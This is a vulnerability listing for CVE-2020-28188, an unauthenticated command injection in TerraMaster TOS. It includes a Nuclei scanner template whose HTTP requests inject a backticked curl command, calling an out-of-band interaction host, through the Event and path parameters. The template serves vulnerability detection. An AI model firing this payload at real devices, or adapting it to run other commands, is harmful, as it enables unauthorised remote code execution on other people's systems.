ProjectDiscoveryNUCLEI:CVE-2020-28188TerraMaster TOS - Unauthenticated Remote Command Execution
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.9%
TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.
id: CVE-2020-28188
info:
name: TerraMaster TOS - Unauthenticated Remote Command Execution
author: gy741
severity: critical
description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
remediation: |
Apply the latest security patch or update provided by TerraMaster to fix the vulnerability.
reference:
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
- https://nvd.nist.gov/vuln/detail/CVE-2020-28188
- http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28188
cwe-id: CWE-78
epss-score: 0.97279
epss-percentile: 0.99845
cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: terra-master
product: tos
tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master
variables:
useragent: '{{rand_base(6)}}'
http:
- raw:
- |
GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: {{useragent}}"
# digest: 4a0a0047304502210085ac18d58b25cda6f18fb57df5ee204220cce67dfd2d614ea043b10b5987195b02200ac8512718ee39d10cc0baed51f32d199ac3e7ef8c366405aa49af3e971df93b:922c64590222798bb761d5b6d8e72950References
packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html
nvd.nist.gov/vuln/detail/CVE-2020-28188
research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.9%